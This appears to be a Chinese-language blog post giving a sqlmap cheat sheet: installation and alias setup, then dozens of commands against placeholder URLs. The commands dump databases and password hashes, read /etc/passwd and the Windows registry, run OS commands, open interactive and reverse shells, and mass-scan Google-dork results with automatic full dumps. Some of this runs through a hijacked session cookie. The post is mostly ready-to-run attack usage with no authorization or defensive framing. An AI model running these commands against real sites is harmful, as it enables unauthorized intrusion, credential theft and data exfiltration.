测试许多款 sql 注入工具 最终还是发现 sqlmap 最为强悍 谁用谁知道! 赶紧抛弃掉手上一大堆 sql 注入工具吧:)

## 测试环境: ubuntu 10.10 & windows 7(x64) sqlmap/1.0-dev (r4405)

如使用过程中出错 请使用下面最近更新的稳定版本: http://dl.dbank.com/c0adthmqf1

### 更新升级:

sqlmap -update

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

### 帮助:

sqlmap -h

官方最新文档:http://sqlmap.sourceforge.net/doc/README.html

# \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*基本步骤\*\*\*\*\*\*\*\*\*\*\*

sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称
sqlmap -u "http://www.xxoo.com/news?id=1" --current-db #获取当前数据库名称
sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db\_name" #列表名
sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db\_name" -v 0 #列字段
sqlmap -u "http://url/news?id=1" --dump -C "column\_name" -T "table\_name" -D "db\_name" -v 0 #获取字段内容

## \*\*\*\*\*\*\*\*\*\*\*\*\*信息获取\*\*\*\*\*\*\*\*\*\*\*\*\*

sqlmap -u "http://url/news?id=1" --smart --level 3 --users # smart 智能 level 执行测试等级

```
sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # dbms 指定数据库类型
sqlmap -u "http://url/news?id=1" --users #列数据库用户
sqlmap -u "http://url/news?id=1" --dbs#列数据库
sqlmap -u "http://url/news?id=1" --passwords #数据库用户密码
sqlmap -u "http://url/news?id=1" --passwords-U root -v 0 #列出指定用户数据库密码
sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db name"
--start 1 --stop 20 #列出指定字段,列出 20 条
sqlmap -u "http://url/news?id=1" --dump-all -v 0 #列出所有数据库所有表
sqlmap -u "http://url/news?id=1" --privileges #查看权限
sqlmap -u "http://url/news?id=1" --privileges -U root #查看指定用户权限
sqlmap -u "http://url/news?id=1" --is-dba -v 1 #是否是数据库管理员
sqlmap -u "http://url/news?id=1" --roles #枚举数据库用户角色
sqlmap -u "http://url/news?id=1" --udf-inject #导入用户自定义函数(获取系统权限!)
sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 #列出当前库所有表
sqlmap -u "http://url/news?id=1" --union-cols #union 查询表记录
sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" #cookie 注入
sqlmap -u "http://url/news?id=1" -b #获取 banner 信息
sqlmap -u "http://url/news?id=1" --data "id=3" #post 注入
sqlmap -u "http://url/news?id=1" -v 1 -f #指纹判别数据库类型
sqlmap -u "http://url/news?id=1" --proxy"http://127.0.0.1:8118" #代理注入
sqlmap -u "http://url/news?id=1"--string"STRING ON TRUE PAGE" #指定关键词
sqlmap -u "http://url/news?id=1" --sql-shell #执行指定 sql 命令
sqlmap -u "http://url/news?id=1" --file /etc/passwd
sqlmap -u "http://url/news?id=1" --os-cmd=whoami #执行系统命令
```

sqlmap -u "http://url/news?id=1" --os-shell #系统交互 shell

sqlmap -u "http://url/news?id=1" --os-pwn #反弹 shell

sqlmap -u "http://url/news?id=1" --reg-read #读取 win 系统注册表

sqlmap -u "http://url/news?id=1" --dbs-o "sqlmap.log" #保存进度

sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume #恢复已保存进度

sqlmap -g "google 语法" --dump-all --batch #google 搜索注入点自动 跑出所有字段 攻击实例:

sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d 28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password

### \*\*\*\*\*\*\*\*\*安装最新版本\*\*\*\*\*\*\*\*\*

ubuntu 通过 apt-get install 安装的 sqlmap 版本为 0.6

我们通过 svn 来安装 为 最新 1.0 版

sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap\_sqlmap-dev

安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py

直接执行 /home/当前用户/sqlmap-dev/sqlmap.py --version

这样很不方便 我们可以设置 .bashrc 文件

sudo vim /home/当前用户/.bashrc

#任意位置加上:

alias sqlmap='python /home/seclab/sqlmap-dev/sqlmap.py'

该环境变量只对当前用户有效

如果想对所有用户有效 可设置全局 编辑下面的文件

vim /etc/profile

同样加上:

alias sqlmap='python /home/seclab/sqlmap-dev/sqlmap.py'

重启生效

www.python.org/getit/ 安装 python

http://www.sliksvn.com/en/download 安装 windows svn client

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev 安装 sqlmap

\*修改环境变量

更多信息请关注 Hi.baidu.com/nginxshell